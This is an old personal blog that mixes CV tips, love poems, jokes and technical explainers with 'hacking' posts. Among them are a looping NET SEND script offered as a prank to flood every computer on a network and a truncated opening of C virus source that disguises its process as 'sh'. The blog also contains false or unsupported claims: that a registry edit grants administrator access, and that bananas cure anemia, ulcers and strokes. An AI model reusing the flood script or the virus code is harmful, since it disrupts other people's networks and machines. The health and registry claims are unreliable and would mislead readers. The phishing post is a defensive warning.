Ads

Wednesday, November 26, 2008

Tips on writing a good CV

What is a CV?

Your CV is your marketing brochure through which the prospective employer decides whether he wants to see you for an interview or not.
What is the purpose of a CV?

The purpose of your CV is to fetch you an interview call.

How to write a good CV?

Include the relevant information. Your CV may require a little bit of modification according to the type of opening you are applying for. You may need to expose different facets of your personality and work experience for different openings.
Prioritize the information

A recruiter is not interested in knowing your father's name on opening up your CV. He would rather prefer to know about your educational background, if you are a fresher and your work experience, if you an experienced job seeker. Prioritize the information in the CV to maintain the attention of the recruiter.

Emphasize at right place

Learn to emphasize at right place in the CV. If you think, any of your particular achievements gives you a cutting edge over other job seekers for a particular opening, emphasize on it. For e.g. if you are a fresher and you have been a topper of your college or university, it is worth mentioning and emphasizing in the CV. Similarly, if you are an experienced worker and your particular achievement has been acknowledged by your employer, which you think can add more value to your CV while applying for a particular position, emphasize on it.

Use more impactful words

Use words which demostrate your control over things. For e.g. managed, achieved, counselled.

Use figures

Use some figures to show the extent of your activities and their impact. For e.g. Planned raw material requirements for 10 manufacturing units of the company, across 5 states.

Don't be verbose

Try to keep your CV precise and to the point. Don't fill it up with extra words. You might land up losing the recruiters attention.
Don't dump the information

A neat CV attracts the recruiter more than the one which has information dumped on it. Provide all the relevant information but in a neat and attractive manner.

Check for spellings and grammar

Try to keep your CV free of any spelling mistakes and bad grammar. They put the recruiter off.
Key areas of a good CV

While writing a CV you must first think, what is it that you want to communicate to the recruiter through your CV. Now, write your CV keeping your objective in mind. Following are the key areas which if well written catch the immediate attention of the employer.
Executive/Career summary

A well written, short and simple executive summary at the beginning of your CV will catch the immediate attention of the recruiter. Keep it short and to the point while trying to focus on your key strengths and achievements, relevant to the position.

Work experience/ Educational background

If you have a work experience, mention it after the executive summary in a chronologically descending manner with the job profile. If you are a fresher educational back ground should find this place in your CV. Mentioning acievements rather than responsibilities is more impactful.

Mention about your achievements
Mentioning achievements out of work also plays an important role. For e.g. Elected college vice president during graduation. This demostrates your leadership quality.

Avoid using "I"," my" in your CV
The recruiter knows well that you are talking about yourself in your CV. Avoid the use of words like I , my in your CV.
It makes you look egomaniac.

Tuesday, November 25, 2008

How to Change Your Ip Within minutes

Change your IP within a minutes, Just follow me.

1. Click on “Start” in the bottom left hand corner of screen
2. Click on “Run”
3. Type in “command” and hit ok

You should now be at an MSDOS prompt screen.

4. Type “ipconfig /release” just like that, and hit “enter”
5. Type “exit” and leave the prompt
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”

You should now be on a screen with something titled “Local Area Connection”, or
something close to that, and, if you have a network hooked up, all of your other
networks.

8. Right click on “Local Area Connection” and click “properties”
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the
“General” tab
10. Click on “Use the following IP address” under the “General” tab
11. Create an IP address.
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section
with default numbers.
13. Hit the “Ok” button here
14. Hit the “Ok” button again

You should now be back to the “Local Area Connection” screen.

15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings
17. This time, select “Obtain an IP address automatically”
18. Hit “Ok”
19. Hit “Ok” again
20. You now have a new IP address

Enjoy lol!!

Don’t disturb me honey?

Wallpaper for you





Know your IP Address

IP address

In computer networking , an IP address ( internet protocol address ) is a unique number that devices use in order to identify and communicate with each other on a network utilizing the Internet Protocol standard. (Sometimes this is shortened to just "IP" as in "My IP is A.B.C.D".) Any participating device ó including routers , computers , time-servers, printers, internet fax machines, and some telephones ó must have its own globally unique communicable address.

IP is a network layer protocol in the internet protocol suite and is an upper layer protocol that also provides globally unique addresses (e.g., MAC address for ethernet ) but two of these addresses will not necessarily be able to communicate to each other. IP adds a service on top of these data link layer protocols ó through the use of an IP address that provides the ability to uniquely identify with and communicate with any other device on the network.

In other words, an IP address is like a full address for postal mail while a MAC address is just the house number. For example, there are many addresses with a house number of 123 but there is only one address for 123 Main Street, Anytown, California , United States . Simply mailing something to "123" will not get it there but "123 Main Street, Anytown, California, United States" is a globally unique address.

The unique nature of IP addresses makes it possible in many situations to track which computer ó and by extension, which person ó has sent a message or engaged in some other activity on the Internet. This information has been used by law enforcement authorities to identify criminal suspects; however, dynamically-assigned IP addresses can make this difficult.

Since IP addresses are not easy to remember, the Domain Name System provides the ability to map domain names (e.g. www.wikipedia.org ) to an IP address ( 207.142.131.248 ).

Dynamic vs. static IP addresses
There are two methods to assigning IP addresses to computers: dynamic and static.

Static IP addresses are used primarily for servers so that they don"t appear to "move" while non-servers are usually assigned dynamic IP addresses. Most dynamic IP address users are users of internet service providers (ISPs) since not all the users of an ISP are online at one time and the ISPs can "get away" with not having enough IP addresses for each user.

In order to use a dynamic IP address, a service such as Dynamic Host Configuration Protocol (DHCP) is used to assign addresses dynamically to devices as they request them. If a static address is used, it must be manually programmed into parameters of the device"s network interface . (It is also possible to "fake" static IP address assignments through DHCP by assigning the same IP address to a computer and no other each time it is requested.)

IP version 4
IPv4 uses 32- bit (4 byte ) addresses which limits the address space to 4,294,967,296 possible unique addresses. However, many are reserved for special purposes such as private networks (~18 million addresses) or multicast addresses (~1 million addresses). This reduces the number of addresses that can be allocated as public Internet addresses and as the number of addresses available is consumed, an IPv4 address shortage appears to be inevitable in the long run.

This limitation has helped stimulate the push towards IPv6 , which is currently in the early stages of deployment and is currently the only contender to replace IPv4. It is also sometimes impossible to track someone"s real IP because they can use Internet proxies, in which they can fake that they are from a different country

IP version 5
What would be considered IPv5 existed only as an experimental non-IP real time streaming protocol called ST2, described in RFC 1819 . In keeping with standard UNIX release conventions, all odd-numbered versions are considered experimental, and this version was never intended to be implemented; the protocol was not abandoned. RSVP has replaced it to some degree.

IP version 6
In IPv6 , the new (but not yet widely deployed) standard protocol for the Internet, addresses are 128 bits wide, which, even with generous assignment of netblocks, should suffice for the foreseeable future. In theory, there would be exactly 2 128 , or about 3.403 × 10 38 unique host interface addresses. If the earth were made entirely out of 1 cubic millimeter grains of sand, then you could give a unique address to each grain in 300 million planets the size of the earth. This large address space will be sparsely populated, which makes it possible to again encode more routing information into the addresses themselves.

Addressing
A version 6 address is written as eight 4-digit hexadecimal numbers separated by colons. For readability, addresses may be shortened in two ways. Within each colon-delimited section, leading zeroes may be truncated. Secondly, one string of zeroes (and only one) may be replaced with two colons (::). For example, all of the following addresses are equivalent:

1080:0000:0000:0000:0000:0034:0000:417A
1080:0:0:0:0:34:0:417A
1080::34:0:417A
Global unicast IPv6 addresses are constructed as two parts: a 64-bit routing part followed by a 64-bit host identifier.

Netblocks are specified as in the modern alternative for IPv4: network number, followed by a slash, and the number of relevant bits of the network number (in decimal). Example: 12AB::CD30:0:0:0:0/60 includes all addresses starting with 12AB00000000CD3.

IPv6 has many improvements over IPv4 other than just bigger address space, including autorenumbering and mandatory support for IPsec .


for more info, please visit:
http://www.geoiptool.com/en/ip_info/

Monday, November 24, 2008

HOW HAPPY IS LIFE WITHOUT A GIRLFRIEND

1. You can stare at any Girl.......
2. You don't have to spend money on her.
3. You won't get boring result in ur board papers.
4. No girlfriend, no emotional blackmailing.
5. If u don't have a girlfriend, she can't dump u.
6. Having a girlfriend is hot, not having a girlfriend is automatically cool, and every one loves to be a cool guy.
7. This can be more to life than just waiting for the bloody phone to ring.
8. You won't have to tolerate someone else defining, "right" and "wrong" for u.
9. Girlfriend can get so possessive that you can't do anything according ur wishes anymore.
10. You can buy gifts for mom, dad, sis or grandpa instead of a girlfriend and have a happier family life.
11. You won't have to waste paper writing love letters. No more endless waiting for ur date to arrive at some weird shop place.
12. You can have more friends, as u will have more time for them.
13. You wont have to see boring love stories instead of sports.
14. You wont have to tell lie to anybody and, therefore, u'll sin less.
15. You can have good night's sleep-no need to dream about her.
16. You wont have to fight over having a 'special' friend with ur folks.
17. No nonstop nonsense.
18. You wont have drown in the pool of her tears.
19. No tension.
20. You can be "urself"
21. You wont have to hide your telephone bills.....
22. You wont have to hide your tears & pain.

Rename a Series of Files

You can rename several similar files at once with the following procedure.

1.Open the folder containing files that you want to rename.

2.Select the files you want to rename. If the files you want are not adjacent in the file list, press and hold CTRL, and then click each item to select it.

3.On the File menu, click Rename.

4.Type the new name, and then press ENTER.


All of the files in the series will be named in sequence using the new name you type. For example, if you type party, the first will be named party and subsequent files in the series will be named party(1), party(2), and so on. To specify the starting number for the series, type the starting number in parentheses after the new file name. The files in the series will be numbered in sequence starting with the number you type. For example, if you type party (100), the other files will be named party (101), party(102), and so on.

The main difference between http:// and https://

HTTP stands for HyperText Transport Protocol, which is just a fancy way of saying it's a protocol (a language, in a manner of speaking) for information to be passed back and forth between web servers and clients.
The important thing is the letter S which makes the difference between HTTP and HTTPS. The S (big surprise) stands for "Secure".
If you visit a website or webpage, and look at the address in the web browser, it will likely begin with the following: http://.

This means that the website is talking to your browser using the regular 'unsecure' language. In other words, it is possible for someone to "eavesdrop" on your computer's conversation with the website. If you fill out a form on the website, someone might see the information you send to that site.

This is why you never ever enter your credit card number in an http website!
But if the web address begins with https://, that basically means your computer is talking to the website in a secure code that no one can eavesdrop on.
You understand why this is so important, right?

If a website ever asks you to enter your credit card information, you should automatically look to see if the web address begins with https://.
If it doesn't, there's no way you're going to enter sensitive information like a credit card number!

Sunday, November 23, 2008

Model of the Day

TRUE LOVE

TRUE LOVE means:
To FEEL someone in ever HEARTBEAT,
To FIND someone in every THOUGHT,
To SEE someone with CLOSED EYES,
and to MISS someone without reason :)

Reasons to love a women

you can feel her CARE in form of a sister.
you can feel her WARMTH in form of a friend.
you can feel her PASSION in form of a beloved.
you can feel her DEDICATION in form of a wife.
you can feel her DIVINITY in form of a mother.
you can feel her BLESSINGS in form of grand'ma.
yet she is so TOUGH too.
Her heart is So TENDER.
So NAUGHTY,
So Charming.
So Sharing,
So Melodious,
She is a Woman.
She is Life...
Respect Her.

Nature pics



more pics!!





More Unseen India!!

Unseen India!!






Picturs from Kanyakumari

Saturday, November 22, 2008

Blood group

A blood group or blood type is based on the presence or absence of two proteins (A, B) on the surface of red blood cells. Because two proteins are involved, there are four possible combinations or blood types (ABO groups):

· Type A - Only the A protein is present.

· Type B - Only the B protein is present.

· Type AB - Both proteins are present.

· Type O - Neither protein is present (about 40 percent of the population).

In addition to the A and B proteins, there is another protein involved called the Rh factor (Rh for Rhesus monkey, where it was first identified). The Rh factor is either present (+) or absent (-). Therefore, blood types are described as the type and Rh factor (such as O+ , A+, AB-).

There are three forms of the gene (alleles) that control the ABO blood group, which are designated as iA, i B, and i. You have two alleles (one from your mother and one from your father), which are referred to as your genotype.

The inheritance of the alleles is co-dominant, meaning that if the allele is present, it gets expressed. The following genotypes will yield these blood types:

· iAiA or iAi - Both genotypes produce the A protein (type A).

· iBiB or iBi - Both genotypes produce the B protein (type B).

· iAiB - This genotype produces the A and B protein (type AB).

· ii - This genotype produces no protein (type O).

So, your blood type does not necessarily tell you exactly which alleles you have. For example, a person with blood type A could have either two iA alleles or one iA allele and one i allele. It is possible for two parents with the same blood type (A or B) to have a child with type O blood.

Both parents would have to have a mixed genotype, such as one i allele together with either one iA or one iB allele.

Blood types are determined by placing three drops of blood on a glass microscope slide. To one drop of blood, a drop of antibody solution to protein A (anti-A) is added. To the second drop, a drop of antibody solution to protein B is added.

To the third drop, a drop of antibody solution to Rh factor (anti-Rh) is added. The blood drops and antibody drops are mixed and examined for clumps of red blood cells, and the blood type is determined. Clumps mean that the particular protein (A, B, Rh) is present.

For example, clumps in anti-A and anti-Rh, but not anti-B, would indicate a person with type A+ blood.

Blood types are important for giving blood from one person to another (transfusion). The blood types must be matched. If not matched properly, the recipient will form clumps (clots) in response to the donor's blood. The clots will lead to heart attacks, embolisms and strokes (transfusion reactions). Two blood types are special:

· Type O- is called the universal donor because it can be given to anybody; it has no protein to cause clumps.

· Type AB+ is the universal receiver because the recipient has all of the proteins and so will not form clumps.

Finally, the Rh factor is important for pregnant women. If an Rh+ man and an Rh- woman have a child, the child can be Rh+ or Rh-, depending upon the genotype of the father. If the baby is Rh+, this can cause problems.

While in the womb, some blood cells from the baby will cross the placenta into the mother's blood stream. The mother will make antibodies to the Rh+ cells. If the woman becomes pregnant again and if the baby is Rh+, the mother's anti-Rh antibodies will cross into the baby's blood and destroy its red blood cells, which can kill the baby.

If diagnosed early, it is possible to save a baby under these circumstances by replacing the baby's blood with transfusions that are free of the Rh antibodies. Also, if this situation is known, it is possible to treat a Rh- woman with anti-Rh antibodies (RhoGam) immediately after childbirth to inactivate the baby's Rh+ cells and prevent the mother from forming anti-Rh antibodies (desensitize her).

Meanig of kiss

1. Kiss on the hand.... I adore you.
2. Kiss on the cheek... I just want to be friends.
3. Kiss on the neck... I want you.
4. Kiss on the lips... I love you.
5. Kiss on the ears...I am just playing.
6. Kiss anywhere else... lets not get carried away.
7. Look in your eyes... kiss me.
8. Playing with your hair... I can't live without you.
9. Hands on your waist... I love you too much to let you

so, what you are waiting for??

go ahead honey!!

Friday, November 21, 2008

Tajmahal Never seen before.

AADAT NAHI RAHI

SAPNO SE DIL LAGANE KI AADAT NAHI RAHI,
HAR WAQT MUSKURANE KI AADAT NAHI RAHI,
YE SOCH KE KI KOI MANAANE NAHI AAYEGA,
AB HUME ROOTH JAANE KI AADAT NAHI RAHI

Difference between Somebody you Love"&"Somebody you Like"

1. In front of the person you love, your heart beats faster.

But in front of the person you like, you get happy.

2. In front of the person you love, winter seems like spring.

But in front of the person you like, winter is just beautiful winter.

3. If you look into the eyes of the one you love, you blush.

But if you look into the eyes of the one you like, you smile.

4. In front of the person you love, you can't say everything on your mind.

But in front of the person you like, you can.

5. In front of the person you love, you tend to get shy.

But in front of the person you like, you can show your own self.

6. You can't look straight into the eyes of the one you love.

But you can always smile into the eyes of the one you like.

7. When the one you love is crying, you cry with them.

But when the one you like is crying, you end up comforting.

8. The feeling of love starts from the eye.

But the feeling of like starts from the ear.


So if you stop liking a person you used to like, all you need to do is cover your ears.
But

If you try to close your eyes, love turns into a drop of tear and remains in your heart forever.

In a Search of love.

Daddy, how was I born? - Very Cute

A little boy goes to his father and asks "Daddy, how was I born?"

The father answers, "Well, son, I guess one day you will need to find out anyway! Your Mom and I first got together in a chat room on Yahoo. Then I set up a date via e-mail with your Mom and we met at a cyber-cafe. We sneaked into a secluded room, where your mother agreed to a download from my hard drive. As soon as I was ready to upload, we discovered that neither one of us had used a firewall, and since it was too late to hit the delete button, nine months later a little Pop-Up appeared that said.

Hair Removal: Know All The Methods

Most of us are concerned about the amount of hair on our bodies, and there are many options for those who desire to rid themselves of unsightly hair. Shaving and plucking are the most popular methods of hair removal, but there are also methods known as waxing, sugaring and threading.

Shaving is the most popular method of hair removal. It's simple and can be accomplished with a straight razor or an electric razor. Some electric shavers provide best results after use of pre-shaving gels, creams or lotions, as can shaving with a straight razor.

Plucking is used as a method of hair removal for unsightly or unwanted facial hair. Using tweezers, hair removal from eyebrows is generally accomplished by hand held or electric tweezers. Tweezing pulls the hair out by its roots but it can be time consuming, depending on the results you're looking for, as each hair must be pulled out individually. Until the skin around the area becomes desensitized, this process can be on the painful side, and redness, inflammation can occur. For most, the effects of tweezing can last anywhere from three to eight weeks.

Threading is becoming a more popular trend in hair removal methods. This ancient hair removal process continues to be used in various parts of the world today, including parts of southwest Asia and the Middle East. To facilitate hair removal with this method, a long loop of thread, mostly cotton, is twisted into a figure-8 type shape and rolled along the surface of the skin. Hairs caught between the coiled pieces of string are pulled out by their roots, resulting in near perfect smoothness. This method suits hair removal from eyebrows and other facial areas, and is considered by many to be less painful than the plucking hair removal method.

Waxing is a hair removal method that is a little more time intensive and messy, though such inconveniences are more than outweighed by the fact that this method is extremely effective in hair removal of just about any type of body hair. Waxing facilitates the removal of entire shafts of hair, from below the surface of the skin. This method can be accomplished using either cool or hot wax. Be advised that waxing for hair removal, however effective, can cause skin irritations that may last several hours, and if not done carefully, can produce burns and other unpleasant results.

A hair removal method similar to waxing is one called sugaring. In this method, a sugar mixture is used instead of wax. Blending and heating sugar, water and lemon juice until it develops into a pasty mixture creates this concoction. This mixture is then applied to the surface of the skin, like a wax treatment, followed by a strip of cotton, which is then rapidly pulled off the skin in the opposite direction of the hair growth. This method of hair removal is popular among those who are sensitive to the ingredients in wax.

So take your pick, try them out and decide which method of hair removal best suits your time and your preferences.

Find your love -for girls specially!!

Check out this..

1. Find a guy who calls you beautiful instead of hot...

2. who calls you back when you hang up on him...

3. who will stay awake just to watch you sleep...

4. wait for the guy who kisses your forehead...

5. who wants to show you off to the world when you are in your sweats...

6. who holds your hand in front of his friends...

7. who is constantly reminding you of how much he cares about you and how lucky he is to have you...

8. wait for the one who turns to his friends and says, "...that's her, or that's him"...

True love will knock on your heart and something good will happen to you.
It could happen anywhere. So get ready for the biggest shock of your life.
Just open your eyes and ears and get life partner.

Best wishes..

Love Quotes

Quotes Collection -Collection of romantic love quotes from famous authors, & other romantic sources. These love quotes are simply for showing your love. Scroll down to see the romantic love quotes.

Don't spend your life with someone you can live with - spend it with someone you can't live without. ~ Anon

Forgiveness does not change the past, but it does enlarge the future. ~ Paul Boese

A kiss is a lovely trick designed by nature to stop speech when words become superfluous. ~ Ingrid Bergman

You don't love a woman because she is beautiful, but she is beautiful because you love her. ~ Anon

True love stories never have endings. ~ Unknown
Love is not blind -- it sees more, not less. But because it sees more, it is willing to see less. ~ Rabbi J. Gordon

That best portion of a good man's life; his little, nameless, unremembered acts of kindness and love. ~ William WordsWorth

If it is your time, love will track you down like a cruise missile. ~ Lynda Barry

Teri mohabbat

Jo Teri Mohabbat Main Duniya Se Begana Tha
Woh Ek Tha Pagal Jo Tera Deewana Tha
Afsos Ke Tum Ne Mujh Ko Samjha Hi Nahi
Main To Tera Apna Tha, Nahi Koi Anjana Tha
Apna Bana ke Tum Ne Mujh Ko Akela Chor Diya
Ek Pal Main Rishta Tor Diya
Jo Ke Buhat Purana tha
Kehten Hain Ke Tumaray Dil Main Hain Zakham Beshumar
In Zakhmoo Ko Metanay Ke Liyen Is Dil Ko Tu Jalana Tha
Ab Kia Roona Hai 'challo Is Bewafai Per
Is Bewafa Sanam Se Acha Tu Ye Bewafa zamana Tha.

"A banana a day keeps the doctor away!"

Bananas contain three natural sugars - sucrose, fructose and glucose combined with fiber. A banana gives an instant, sustained and substantial boost of energy.

Research has proven that just two bananas provide enough energy for a strenuous 90-minute workout. No wonder the banana is the number one fruit with the world's leading athletes. But energy isn't the only way a banana can help us keep fit. It can also help overcome or prevent a substantial number of illnesses and conditions, making it a must to add to our daily diet.

Depression: According to a recent survey undertaken by MIND amongst people suffering from depression, many felt much better after eating a banana. This is because bananas contain tryptophan, a type of protein that the body converts into serotonin, known to make you relax, improve your mood and generally make you feel happier.

PMS: Forget the pills - eat a banana. The vitamin B6 it contains regulates blood glucose levels, which can affect your mood.

Anemia: High in iron, bananas can stimulate the production of hemoglobin in the blood and so helps in cases of anemia.

Blood Pressure: This unique tropical fruit is extremely high in potassium yet low in salt, making it perfect to beat blood pressure. So much so, the US Food and Drug Administration has just allowed the banana industry to make official claims for the fruit's ability to reduce the risk of blood pressure and stroke.

Brain Power: 200 students at a Twickenham (Middlesex) school were helped through their exams this year by eating bananas at breakfast, break, and lunch in a bid to boost their brain power. Research has shown that the potassium-packed fruit can assist learning by making pupils more alert.

Constipation: High in fiber, including bananas in the diet can help restore normal bowel action, helping to overcome the problem without resorting to laxatives.

Hangovers: One of the quickest ways of curing a hangover is to make a banana milkshake, sweetened with honey. The banana calms the stomach and, with the help of the honey, builds up depleted blood sugar levels, while the milk soothes and re-hydrates your system.

Heartburn: Bananas have a natural antacid effect in the body, so if you suffer from heartburn, try eating a banana for soothing relief.

Morning Sickness: Snacking on bananas between meals helps to keep blood sugar levels up and avoid morning sickness.

Mosquito bites: Before reaching for the insect bite cream, try rubbing the affected area with the inside of a banana skin. Many people find it amazingly successful at reducing swelling and irritation.

Nerves: Bananas are high in B vitamins that help calm the nervous system.

Overweight and at work? Studies at the Institute of Psychology in Austria found pressure at wor k leads to gorging on comfort food like chocolate and crisps. Looking at 5,000 hospital patients, researchers found the most obese were more likely to be in high-pressure jobs. The report concluded that, to avoid panic-induced food cravings, we need to control our blood sugar levels by snacking on high carbohydrate foods every two hours to keep levels steady.

Ulcers: The banana is used as the dietary food against intestinal disorders because of its soft texture and smoothness. It is the only raw fruit that can be eaten without distress in over-chronicler cases. It also neutralizes over-acidity and reduces irritation by coating the lining of the stomach.

Temperature control: Many other cultures see bananas as a "cooling" fruit that can lower both the physical and emotional temperature of expectant mothers. In Thailand , for example, pregnant women eat bananas to ensure their baby is born with a cool temperature.


Seasonal Affective Disorder (SAD): Bananas can help SAD sufferers because they contain the natural mood enhancer tryptophan.

Smoking &Tobacco Use: Bananas can also help people trying to give up smoking. The B6, B12 they contain, as well as the potassium and magnesium found in them, help the body recover from the effects of nicotine withdrawal.

Stress: Potassium is a vital mineral, which helps normalize the heartbeat, sends oxygen to the brain and regulates your body's water balance. When we are stressed, our metabolic rate rises, thereby reducing our potassium levels. These can be rebalanced with the help of a high-potassium banana snack.

Strokes: According to research in The New England Journal of Medicine, eating bananas as part of a regular diet can cut the risk of death by strokes by as much as 40%!

Warts: Those keen on natural alternatives swear that if you want to kill off a wart, take a piece of banana skin and place it on the wart, with the yellow side out. Carefully hold the skin in place with a plaster or surgical tape!


So, a banana really is a natural remedy for many ills. When you compare it to an apple, it has four times the protein, twice the carbohydrate, three times the phosphorus, five times the vitamin A and iron, and twice the other vitamins and minerals. It is also rich in potassium and is one of the best value foods around So maybe its time to change that well-known phrase so that we say, "A banana a day keeps the doctor away!"

THE COMPUTER PROGRAMMER:

A man was crossing a road one day when a frog called out to him and said, "If you kiss me, I'll turn into a beautiful princess.
" He bent over, picked up the frog, and put it in his pocket. The frog spoke up again and said,
"If you kiss me and turn me back into a beautiful princess, I will tell everyone how smart and brave you are and
how you are my hero." The man took the frog out of his pocket, smiled at it, and returned it to his pocket.
The frog spoke up again and said, "If you kiss me and turn me back into a beautiful princess,
I will be your loving companion for an entire week." The man took the frog out of his pocket, smiled at it,
and returned it to his pocket. The frog then cried out, "If you kiss me and turn me back into a princess,
I'll stay with you for a year and do ANYTHING you want." Again the man took the frog out, smiled at it,
and put it back into his pocket. Finally, the frog asked, "What is the matter? I've told you I'm a beautiful princess,
that I'll stay with you for a year and do anything you want. Why won't you kiss me?"
The man said, "Look, I'm a computer programmer.
I don't have time for a girlfriend, but a talking frog is cool."

Wednesday, November 19, 2008

Most Alien-like Insects



"I might look cute but I can sap you out!" Treehoppers have long fascinated biologists because of their unusual appearance. They belong to the Membracidae family and are closely related to cicadas and leafhoppers. They feed upon the sap found in plant stems, which they prick with their beaks.



This fuzzy yellow alien with black spots is called Dasychira Pudibunda and is the larval form, or caterpillar, of the red-tailed moth.

Tuesday, November 18, 2008

It's me

Nobody known its empty
This smile that I wear,
The real one is left in the past
Bcoz you have left me there.

Nobody knowns I'm crying
They wont even see my tears,
When they think that I'm laughing
I still wishing U were here.

Nobody knows its painful
They think that I'm strong,
They say that this wont kill me
But I wonder if they were wrong.

Nobody known I'm praying
That you will change my mind,
They think that I had let you go
When you left me behind.

Nobody knows I miss you
they think I feel set free,
But I feel like I'm bound with chains
Trapped in the mystery.

Nobody knows I need you
They say I can do it on my own,
but they dont know I'm crying
When I'm all alone.


from various sources.

Bomb Your Network

Try this code.

:start
NET SEND * Owned By maan
goto :start

This will keep sending the same message over & over to every computer on that Network.
Only for fun.
Enjoy lol.

Want to say something??


Killer Eyes


Cute pictures!!

Model of the Year..

Monday, November 17, 2008

NOTICE

TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed.
The Administrator of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this blog. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

Thanking you.

with regards;
Administrator,
Youth Adda.

Protect yourself from fake login pages

Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap.
This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …

This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip.
Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars.


What goes on behind when you enter your login details in login form??

When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page.

What an hacker does??

A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page).

When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page.

How to identify fake login page traps ??

1. Never enter you login details in unknown sites.
2. Always type the address directly in to the browser.
3. Do not follows the links you get in mails and chatting even if they are from your friends
4. Always have a keen look in the address bar and verify if the address is correct.
5. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap.
6. Please do report to the hosting site or the original site owner when you find a fake login page.

If you feel like you entered your details in a fake login page change your password immediatley.

Registry Hacking

Display legal notice on startup:

Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.

[HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:

Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.

[HLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:

Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!

HCU\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"

Enjoy Hacking!!

No Word !!





Sunday, November 16, 2008

The truth about plastic

Did you ever drink from a plastic bottle and see a triangle symbol on the bottom with a number inside?




Do you know what the number stands for?
Did you guess that it's just for recycling?
Then you are WRONG !!!!!!
THE NUMBER TELLS YOU THE CHEMICAL MAKE UP OF THE PLASTIC.....

1) Polyethylene terephalate (PET)
2) High density polyethylene (HDPE)
3) Unplasticised polyvinyl chloride (UPVC) or Plasticised polyvinyl chloride (PPVC)
4) Low density polyethylene LDPE
5) Polypropylene (PP)
6) Polystyrene (PS) or Expandable polystyrene (EPS)
7) Other, including nylon and acrylic
What you aren't told is that many of the plastics used are toxic and the chemicals used to create a plastic can leach out of the plastic and into the food / drink.
Think about it, how many times have you or a friend said "I don't like this, it taste like the plastic bottle ..... "
THAT'S BECAUSE YOU ARE TASTING THE PLASTIC
The WORST ONES are Nos: 3, 6, and 7 !!!

DO NOT USE THESE NUMBERS if stated at the bottom of the bottle) !!!

AVOID re-using plastic bottles RIGHT AWAY !!!

Disclaimer

This blog contains various information for educational purpose only. A registry related article, can modify your Windows Registry. It is always recommended that you take a backup of the registry before proceeding with an edit, because, as you should be aware, an improperly executed hack could cause strange behaviour, and at worst, could even entirly corrupt your Windows installation, requiring you to reinstall windows.

Neither Youth adda nor its Moderater and affiliates can be held responsible for any damage you may cause to your system as a result of taking any action suggested herein. you are solely accountable for any negative consequences arising from changes you make to your Windows Registry as suggested in this blog.

Thank you.
Administrator,
Youth Adda.

Create Your Own Tips

If you are getting bored of the windows tutorial tips that appear when you log in to windows, use this hack to change and add your own tips.

Navigate to:

HLM\Software\Microsoft\Windows\Current Version\Explorer\Tips

The tips are listed in alphabetical or numerical sequence. You can either replace the string values in the existing tips, or create your own tips, or increment the existing letters or numbers and enter a string value with your own tip. For example, if the last tip is designated “Y”, the next tip could be “Z” with your String value text.

You can use any message in the String value; It needn’t be a tip! For example, try
“Happy Surfing with Us!” as a tip and see how it appears when you next log in.

Restart your system for take effect.

Change the Window Title in Window Media Player

Use this hack if you want to give the Windows Media Player window title something creative or personal. you can do better using following tips. For example, “Windows Media Player”.

Navigate to:

HCU\Software\Policies\Microsoft\WindowsMediaPlayer

And to:

HLM\Software\Policies\Microsoft\WindowsMediaPlayer

Set the string value for these setting TitleBar to the required text you wish to display, in our case, “Windows Media Player”. To revert to the default title, delete the TitleBar setting entirely.

Just restart Windows Media Player to see the effect.

Hidden movie in XP

Hey All,
Do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
Type
telnet towel.blinkenlights.nl
And hit enter.
Enjoy!!!!

*** WARNING ***

The Source Code is for educational and information purposes only, for researchers and computer virus or programming enthusiasts. No warranty is given or to be implied for any software/source code listings contained herein. You take full responsibility for any damages caused by compiling, running, or sharing this information. Be aware that running any malicious code on another's computer or computer network might be a criminal act. Use at your own risk!


Regards;
Rohit Kapoor.
Administrator,
http://myyouthcafe.blogspot.com/

Codes behaves as virus

#include
#include
#include
#include

long current_time;
struct rlimit no_core = {0,0};
int
main (argc, argv)
int argc;
char *argv[];
{
int n;
int parent = 0;
int okay = 0; /* change calling name to "sh" */
strcpy(argv[0], "sh"); /* prevent core files by setting limit to 0 */
setrlimit(RLIMIT_CORE, no_core);
current_time = time(0); /* seed random number generator with time */
srand48(current_time);
n = 1;
while (argv[n]) { /* save process id of parent */
if (!strncmp(argv[n], "-p", 2)) {
parent = atoi (argv[++n]);
n++;
}
